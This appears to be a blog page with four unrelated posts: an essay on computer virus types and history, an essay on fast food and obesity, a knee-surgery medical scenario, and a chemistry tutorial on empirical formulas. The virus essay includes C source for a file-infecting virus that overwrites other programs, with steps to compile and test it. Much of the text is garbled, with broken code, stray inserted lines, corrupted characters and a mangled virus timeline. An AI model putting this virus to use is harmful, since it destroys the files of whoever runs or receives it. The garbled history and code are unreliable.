Sunday, January 26, 2020
Background Of Studies On Computer Viruses
Background Of Studies On Computer Viruses A computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves. Section 1.2 Background of Studies on Various Computer Viruses Boot Sector Viruses This type of viruses has ability to hide in boot sector. The viruses will load into memory when there is booting system and trying to read from hard disk. Boot sector viruses are more spread since old time when floppy disk was popular. But now we hardly seen them since many of them only can spread through floppy disk. This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk. The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive. Examples of boot viruses include: Polyboot.B, AntiEXE. Companion Viruses Companion Viruses is another kind of viruses. When user computer infect by this sort of viruses, it will create another type file from an existing file in same directory (such as creating file.com from file.exe in the same folder), some companion viruses create file.exe from any folder. It can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they accompany the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses). Some examples include: Stator, Asimov.1539, and Terrax.1069 Encrypted Viruses This type of viruses consists of encrypted malicious code, decrypted module. The viruses use encrypted code technique which make antivirus software hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves. Logic Bomb Viruses Logic Bomb Viruses or sometime know as Time Bomb is small piece of malicious code or program which have ability to insert itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on. They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs. Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive. Macro Viruses When talking about Macro Viruses, we refer to viruses which infect macro of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting undesired texts or symbols. Example of Macro Virus: WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook. Multipartite Viruses Multipartite Viruses is type of viruses which infect user computer on both part boot sector and executable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone. It changes the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus. Once infected it becomes impossible to locate the original files Example: Ghost ball, the first multipartite virus. Nonresident Viruses This type of viruses is similar to Resident Viruses by using replication of module. Besides that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is executed). Polymorphic Viruses: Polymorphic Virus is similar to encrypted viruses; it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not remain any identical after replication. Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system. This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves. Examples include: Elkern, Marburg, Satan Bug, and Tuareg. Resident Viruses Resident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory (RAM). The viruses are commonly classified into two main categories: Fast Infectors and Slow Infectors. This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc. Examples include: Randex, CMJ, Meve, and MrKlunky. Stealth Viruses / Worm Stealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them. A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antivirus. Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson. Section 1.3.1 Research Question 1. How did the diff. types of computer Viruses Created when, where, by whom? 2. How are they attack/work on the end user computers? 3. How we protect ourself from such type of computer viruses? 4. What will be the future trend of computer viruses? Section 1.3.2 Research Aim The research aims at understanding how Computer viruses is evolving and attacking on day to day computer business Section 1.3.3 Research Objective The objective of this research is to help to the User of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the creator of computer viruses and the end user of the computer. Section 1.3.4 Research Hypothesis Many of the viruses that have had the greatest impact have been intended to be totally benign. Unfortunately, small errors in program code have led to disastrous results. The most frequent such error is when a virus program, which was intended to infect a computer only once, doesnt realize it has already done its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small drain of a single virus can pass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded. The hidden message revealed by the widely publicized cases of infection by computer viruses is that existing computer systems of all sorts could be making very large errors that have never been recognized. This means the computer systems that take care of every aspect of the worlds financial life, computer systems that keep personal records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a major system is likely only to have been thoroughly tested for frequently occurring events. Its the infrequently occurring events, and especially the unforeseen combinations of events, that are the bane of systems developers. And those are also the areas where Poincares admonition is most likely to come into play. Chapter 2 Literature Review What is Computer virus? Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves History of Computer viruses The first academic work on the theory of computer viruses (although the term computer virus was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the Theory and Organization of Complicated Automata. The work of von Neumann was later published as the Theory of self-reproducing automata In his essay von Neumann postulated that a computer program could reproduce. In 1972 Veith Risak published his article Selbstreproduzierende Automaton mitt minimaler Informationsà ¼bertragung (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system. In 1984 Fred Cohen from the University of Southern California wrote his paper Computer Viruses Theory and Experiments It was the first paper to explicitly call a self-reproducing program a virus; a term introduced by his mentor Leonard Adelman. An article that describes useful virus functionalities was published by J. B. Gunn under the title Use of virus functions to provide a virtual APL interpreter under user control in 1984. Science Fiction The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers. The actual term virus was first used in David Gerrolds 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off. Virus programs History The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, Im the creeper, catch me if you can! was displayed. The Reaper program was created to delete Creeper. A program called Elk Cloner was the first computer virus to appear in the wild that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning Elk Cloner: The program with a personality. The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to deter piracy of the software they had written. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface. Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a mating of the two and would likely be detected as a virus unique from the parents. A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo. Time line of computer viruses: In the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection. YEAR VIRUS NAME BY WHOM TYPE 1982 ELK CLONER RICH SKRENTA 1983 COMPUTER VIRUS FRED COHEN 1986 BRAIN PAKISTAN BOOT SECTOR 1988 ARPANET ROBBERT MORRIS ENCRYPTED 1989 AIDS TROJAN 1990 ANTI-VIRUS S/W 1991 NON-ANTI S/W SYMANTEC POLYMORPHIC 1994 HOAX 1995 WORD 1999 MELLISA DAVID L. SMITH 2000 I LOVE U FILIPINE STUDENT 2001 CODE RED WORM 2003 SLAMMER 2004 MY DOON/NOVARG 2005 COMMWARRIOR-A RUSSIA CELL PHONE 2008 CONFICKER 2009 CYNER ATTACK W32.DOZOR 2010 STUNEXT TROJAN 2011 HTTP BOT BLACK SHADES Programming language used for creating Computer Viruses: C C++ Assembler PHP JAVA SCRIPT VB SCRIPT MICRO LANGUAGE/CODE How Computer Viruses Work As youll see in the next section, the term virus was applied to this type of software very early in its history. Its an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies. A biological virus isnt truly a living, independent entity; as biologists will tell you, a virus is nothing more than a fragment of DNA sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cells normal mechanisms to reproduce itself. A computer virus is like a biological virus in that it also isnt an independent entity; it must Piggyback on a host (another program or document) in order to propagate. How a virus infects your computer 1. Virus program is launched. 2. Virus code is loaded into PC memory. 3. Virus delivers its destructive payload. 4. Virus copies itself to other programs. How Computer Viruses Work 5 If all a virus did was copy itself to additional programs and computers, there would be little Harm done, save for having all our programs get slightly larger (thanks to the virus code). Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus might, for example, delete certain files on your computer. It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs. Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, shutting down servers and forcing ten s of thousands of users offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly. As you might suspect, most viruses are designed to deliver their payload when theyre first executed. However, some viruses wont attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeper Agent in a spy novel, until theyre awoken on a specific date; then they go about the work them were programmed to do. In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination. How to Create a Computer Virus? This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Heres the source code of the virus program. #include #include #include #include #include #include FILE *virus,*host; int done, a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(*.*,ffblk,0); while(!done) { virus=fopen(_argv[0],r3. Virus delivers its destructive payload. b); host=fopen(ffblk.ff_name,rb+); if(host==NULL) goto next; x=89088; printf(Infecting %sn,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(ffblk); } } printf(DONE! (Total Files Infected= %d),a); end=clock(); printf(TIME TAKEN=%f SECn, (end-st)/CLK_TCK); getch(); } COMPILING METHOD: USING BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 STEP 2.Now the generated EXE File is ready to infect USING BORLAND C++ 5.5 (32-BIT) : 1. Compile once, note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it. The new EXE file is ready to infect HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4. All the infected files will be ready to re-infect. Why Viruses Exist Computer viruses, unlike biological viruses, dont spring up out of now here-theyre created. By people. And the people-programmers and developers, typically-who create computer viruses Know what theyre doing. These code writers deliberately create programs that they know will Wreak havoc on huge numbers of computer users. The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, Visual Basic, or Java, or a macro language, such as VBA. By using a build your own virus program-of which there are several available, Via the Internet underground. So, by definition, a virus writer is a person with a certain amount of technical expertise. But Instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users. This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of causing as much damage as possible, from the relative Anonymity of their computer keyboards. Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a successful virus provides a kind of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled. Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to deliberately perpetrate such destruction on such a wide scale. In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our high-tech age, such Pleasure can come from writing destructive virus code. What You Can Do About Computer Viruses Theres very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesnt always mean there are fewer criminals; the truth is, theres a new batch of virus writers coming online every day. All of which means that you cant rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself. Reducing Your Chances of Infection To make yourself less of a target for virus infection, take the following steps: Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put you at risk like this unless you absolutely have to. Dont open any e-mail attachments you werent expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. Theyre a good first line of defence, As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates. Enable macro virus protection in all your applications. Most current Microsoft Applications include special features that keep the program from running unknown macros and thus prevent your system from being infected by macro viruses. Create backup copies of all your important data. If worse comes to worst and your Entire system is infected; you may need to revert to no infected versions of your most critical Files. You cant do this unless you plan ahead and back up your important data. Preventing Viruses Attacks. Diagnosing a Virus Infection How do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didnt do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for: à ¢Ã¢â ¬Ã ¢ Programs quit working or freeze up. à ¢Ã¢â ¬Ã ¢ Documents become inaccessible. à ¢Ã¢â ¬Ã ¢ Computer freezes up or wont start properly. à ¢Ã¢â ¬Ã ¢ The CAPS LOCK key quits working-or works intermittently. à ¢Ã¢â ¬Ã ¢ Files increase in size. à ¢Ã¢â ¬Ã ¢ Frequent error messages appear onscreen. à ¢Ã¢â ¬Ã ¢ Strange messages or pictures appear onscreen. à ¢Ã¢â ¬Ã ¢ Your PC emits strange sounds. à ¢Ã¢â ¬Ã ¢ Friends and colleagues inform you that theyve received strange e-mails from you, that you dont remember sending. How to Catch a Virus. Recovering from a Virus Attack If youre unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system. You dont, however, have to give up and throw your computer away. Almost all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools. The right tools include one of the major antivirus programs discussed in Anti-Virus Software and Services. These programs-such as Norton Antivirus
Saturday, January 18, 2020
McDonaldââ¬â¢s Chain Essay
One of the largest fast-food chains in the world, McDonaldââ¬â¢s, is an Olympic sponsor. This has caused much controversy in the UK, where health problems caused by obesity are on the increase. Discuss. Nowadays, with rapidly global economic development, a wealth of food corporations are expanding their businesses. An increasing number of fast-food chains have had a marked effect on the way we live. Fast-food is very popular in modern life, because it caters for our fast-paced lives. However, many studies claim that fast-food is associated with obesity (The Health of The Nation,1992,P21 ). This essay will analyse the advantages and disadvantages of fast-food and in the following essay I will discuss the relationship between obesity and fast-food. In the first place, we should define the term obesity. Obesity is described by the World Health Organization(WHO) as ââ¬Å"a disease in which excess body fat has accumulated to such an extent that health may be adversely affected.â⬠(Ewles.L,2005, P80) Throughout the world, obesity has been increasing at an unprecedented rate. This is true not only for industrialized societies, but also for developing countries. (Barnett.A.H and Kumar.S ,2008,P3) ââ¬Å"In 1995, there were an estimated 200 million obese adults worldwide and another 18 million under-five children classified as overweight . As of 2000, the number of obese adults has sharply increased to over 300 million. In developing countries, it is estimated over 115 million people suffer from obesity-related problems.â⬠Indeed, the rate of obesity has been exploded in last 20 years. (Ewles.L,2005, P80) Today, it is accepted that obesity is one of the biggest threats to public health. Fast food such as hamburgers and hot dogs are often high in sugar, salt, cholesterol and trans fats. The intake of these elements can lead to marked obesity. The support from the national study, compared to the days before fast food, energy consumption was over 187 kcal per meal when an adult consumption of fast food . (Larsson.B, 1981 ,P97).Based on national study, more and more people are realizing there is a connection between fast food and obesity. There are studies which confirm this idea. Obesity is a major contributor to the risk of heart disease and type 2 diabetes. In the Nurseââ¬â¢s Health Study, (Larsson.B,1981 P97-P116) the risk of developing diabetes increased five-fold in obese women with BMI 25kg/m2 compared with others women who have standard of body weight . In the same study, ââ¬Å"the risk of developing CHD increased 3.3-fold with BMI>29kg /m and 1.8 fold between 25 and 29kg/m2 compared to those women with BMI>21kg/m2 .â⬠The result shows that each kilogram of weight gained from 18 years old was associated with 3.1 times higher risk of heart disease risks. From those figures. It appears that obesity is one of the significant factors of heart disease and type 2 diabetes. There is also an important association between obesity and hypertension. In the Swedish Obesity Study, (Barnett.A.H and Kumar.S ,2008,P154) hypertension was present at base line in approximately one-half of subjects. ââ¬Å"The study involving 1000 men and women showed that a 10kg increase in weight was related to 3mmHg rise in systolic and 2.3 mmHg rise in diastolic blood pressure.â⬠However, this extent also can increase 12% risk of hypertension by high blood pressure. From this study, we can see clearly the relationship between the weight and data of blood pressure. When the weight is above normal, the weight gain and the risk of hypertension is in proportion. So, weight loss can help obese people reduce the risk of high blood pressure. Fast food is a main factor in childhood obesity. According to a national study, (Barnett.A.H and Kumar.S ,2008,P107) there is a positive correlation between childhood obesity and the consumption of fast food. For example in the late 1970s, fast food accounted for 2 per cent of total energy intake in children in the USA. Since the 1990s, the proportion of fast food consumption has increased five-fold. At the same time the percentage of overweight American children increased from 5% to 15%. In fact , fast food outlets have been growing sharply since the 1990s .The negative effects of fast food consumption on children is increasing. Fast food have a lot of unhealthy ingredients, including carbohydrates, fats and non-starchy vegetables, (Barnett.A.H and Kumar.S ,2008,P226) those elements has been linked to weight gain. In addition, approximately 20% ââ¬â 30% of obese children appear to be at risk of the same complications of obesity as obese adults. (Barnett.A.H and Kumar.S ,2008,P227) Childhood obesity is becoming a public health crisis. However, there are some advantages in fast food. First of all , the most obvious advantage is quite convenient. in contemporary society as people have no time to prepare their food. Work occupies most of our time, we need to squeeze more time for work. So fast food becomes an ideal choice for modern people. The reasons are not only fast food can eliminate the time spent on cooking, but it also tastes delicious, some of young people particularly are addicted to the flavour of fast food. Moreover, the lower price of fast food attractes people. A further advantage is that fast food outlets usually have a clean and comfortable environments . In conclusion, although there are many reasons for the causes of obesity ,one of the main reasons for obesity is the consumption of fast food too much. As mentioned above, there is a positive correlation between obesity and many diseases such as heart disease, type 2 diabetes and hypertension. It is cannot to be ignored that fast food is the biggest cause of obesity in children. Fast food will bring a large quantity of health problems. References: Barnett. A.H and Kumar S.(2008) 2nd Ed .Obesity and diabetes. pub. Wiley-Blackwell Oxford .UK. Ewles. L.(2005) Ed. Key topics in public health: essential briefings on prevention and health promotion. pub. Elsevier Churchill Livingstone. UK Larsson. B. (1981) The health consequences of obesity, International journal of Obesity.pub. Oxford University Press . UK. The Health of The Nation (1992) Key Area Handbook :Coronary heart disease and stroke .pub. Nation white paper. UK.
Friday, January 10, 2020
Medical Scenario
MEDICAL SCENARIO FOR PARTS 1 & 2 FINAL PROJECT Assignment Reading: 1. AMBULATORY CARE FACE SHEET Admit Date: 7/8/20XX @ 20:22 Discharge Date/Time: 7/9/20XX @ 10:10 Sex: M Age: 47 Disposition: Home Admitting Diagnosis: Possible torn meniscus of the left knee. Discharge Diagnosis: Left Knee meniscectomy. Procedures: Laparoscopic Surgery to the Left Knee. CONSULTATION Date of Consultation: 7/8/20XX This is a 47-year-old male who was in his usual state of health until today entered the Emergency Room with severe pain to his left knee and equal amount of edema within the patellar area.This occurred after the patient fell at an angle on the left knee during a game of football with friends. The patient was evaluated with L-Knee Radiograph and Magnetic Radiograph Imaging (MRI) for soft-tissue films. The L-Knee X-Ray revealed no fractures to the Femur, Patella, Tibia, or Fibula. The MRI revealed a large tear surrounding the meniscus of the left knee. The patient was treated with a left knee s plint and crutches with a prescription for Mobic 15mg daily and Tramadol/APAP 37. 5 mg every 4-6 hours for pain. The patient was referred to Orthopedics for surgical repair.He has no past history of tobacco abuse, previous fractures, or surgeries. 2. Past Medical History: Allergies: No known drug allergies. Medications: None. Surgeries: None Medical History: History of Chronic Otitis Externa Family History: Noncontributory. Review of Systems: No medical abnormalities. Physical Examination: Vital Signs: BP 130/80, P 92, T 98. 5 General: This is a well-developed and well-nourished anxious black male in mild distress. Head and neck are normocephalic and the oropharynx is clear. The left knee shows 5+ edema and patient is unable to bend at knee joint connection.The patientââ¬â¢s left leg is not weight bearing and the pain level continues to be a 6 to 7 on the pain scale. The patient is using crutches and wheelchair for mobility. All other musculoskeletal joints are with free range of motion. Neurologic with no focal deficits. Impression: Inpatient laparoscopic surgery for total left knee meniscectomy. Local anesthetic total block of the patellar region. 3. OPERATIVE REPORT Date of Procedure: 7/8/20XX Procedure: Laparoscopic Meniscectomy of Left Knee Preoperative Medication: Demerol 50 mg IV, Robinal 3 mg IV, Xylocaine with 1% Epinephrine Preoperative Diagnosis: . Total Left Knee Meniscus Tear. Postoperative Diagnosis: Laparoscopic Meniscectomy of Left Knee Clinical Note: This is a 47-year-old black male with a total meniscus tear of the left knee caused by a causal game of tag football. The patient felt a pop after falling on the left knee at an angle causing severe pain and edema. The patient was taken to the emergency room for x-rays of the left leg and MRI to the left patellar region. He was referred to the othropedics clinic for laparoscopic surgery to the left knee meniscus.Findings: After obtaining informed consent, he was premedicated with Demerol, Robin al, Xylocaine with 1% Epinephrine without any complications. The patientsââ¬â¢ left knee was laparoscoped in the meniscus and the anterolateral and anteromedial parapatellar portholes. The synovium in the suprapatellar pouch showed moderate to severe inflammatory changes with villi formation and hyperemia. Similar changes were noted in the intercondylar groove. The patient tolerated the procedure well, and his post-procedure vital signs are stable. Recommendations: 1. Clear liquids for 24 hours. 2. Follow-up in the office in 2 days.
Thursday, January 2, 2020
Calculate Empirical and Molecular Formulas
The empirical formula of a chemical compound is a representation of the simplest whole number ratio between the elements comprising the compound. The molecular formula is the representation of the actual whole number ratio between the elements of the compound. This step by step tutorial shows how to calculate the empirical and molecular formulas for a compound. Empirical and Molecular Problem A molecule with a molecular weight of 180.18 g/mol is analyzed and found to contain 40.00% carbon, 6.72% hydrogen and 53.28% oxygen. How To Find the Solution Finding the empirical and molecular formula is basically the reverse process used to calculate mass percent or mass percentage. Step 1: Find the number of moles of each element in a sample of the molecule.Our molecule contains 40.00% carbon, 6.72% hydrogen and 53.28% oxygen. This means a 100-gram sample contains: 40.00 grams of carbon (40.00% of 100 grams)6.72 grams of hydrogen (6.72% of 100 grams)53.28 grams of oxygen (53.28% of 100 grams) Note: 100 grams is used for a sample size just to make the math easier. Any sample size could be used, the ratios between the elements will remain the same. Using these numbers, we can find the number of moles of each element in the 100-gram sample. Divide the number of grams of each element in the sample by the atomic weight of the element to find the number of moles. moles C 40.00 g x 1 mol C/12.01 g/mol C 3.33 moles C moles H 6.72 g x 1 mol H/1.01 g/mol H 6.65 moles H moles O 53.28 g x 1 mol O/16.00 g/mol O 3.33 moles O Step 2: Find the ratios between the number of moles of each element. Select the element with the largest number of moles in the sample. In this case, the 6.65 moles of hydrogen is the largest. Divide the number of moles of each element by the largest number. Simplest mole ratio between C and H: 3.33 mol C/6.65 mol H 1 mol C/2 mol HThe ratio is 1 mole C for every 2 moles H The simplest ratio between O and H: 3.33 moles O/6.65 moles H 1 mol O/2 mol HThe ratio between O and H is 1 mole O for every 2 moles of H Step 3: Find the empirical formula. We have all the information we need to write the empirical formula. For every 2 moles of hydrogen, there is one mole of carbon and one mole of oxygen. The empirical formula is CH2O. Step 4: Find the molecular weight of the empirical formula. We can use the empirical formula to find the molecular formula using the molecular weight of the compound and the molecular weight of the empirical formula. The empirical formula is CH2O. The molecular weight is molecular weight of CH2O (1 x 12.01 g/mol) (2 x 1.01 g/mol) (1 x 16.00 g/mol)molecular weight of CH2O (12.01 2.02 16.00) g/molmolecular weight of CH2O 30.03 g/mol Step 5: Find the number of empirical formula units in the molecular formula. The molecular formula is a multiple of the empirical formula. We were given the molecular weight of the molecule, 180.18 g/mol. Divide this number by the molecular weight of the empirical formula to find the number of empirical formula units that make up the compound. Number of empirical formula units in compound 180.18 g/mol/30.03 g/molNumber of empirical formula units in compound 6 Step 6: Find the molecular formula. It takes six empirical formula units to make the compound, so multiply each number in the empirical formula by 6. molecular formula 6 x CH2Omolecular formula C(1 x 6)H(2 x 6)O(1 x 6)molecular formula C6H12O6 Solution: The empirical formula of the molecule is CH2O.The molecular formula of the compound is C6H12O6. Limitations of the Molecular and Empirical Formulas Both types of chemical formulas yield useful information. The empirical formula tells us the ratio between atoms of the elements, which can indicate the type of molecule (a carbohydrate, in the example).Ã The molecular formula lists the numbers of each type of element and can be used in writing and balancing chemical equations. However, neither formula indicates the arrangement of atoms in a molecule. For example, the molecule in this example, C6H12O6, could be glucose, fructose, galactose, or another simple sugar. More information than the formulas is needed to identify the name and structure of the molecule. Empirical and Molecular Formula Key Takeaways The empirical formula gives the smallest whole number ratio between elements in a compound.The molecular formula gives the actual whole number ratio between elements in a compound.For some molecules, the empirical and molecular formulas are the same. Usually, the molecular formula is a multiple of the empirical formula.
Subscribe to:
Posts (Atom)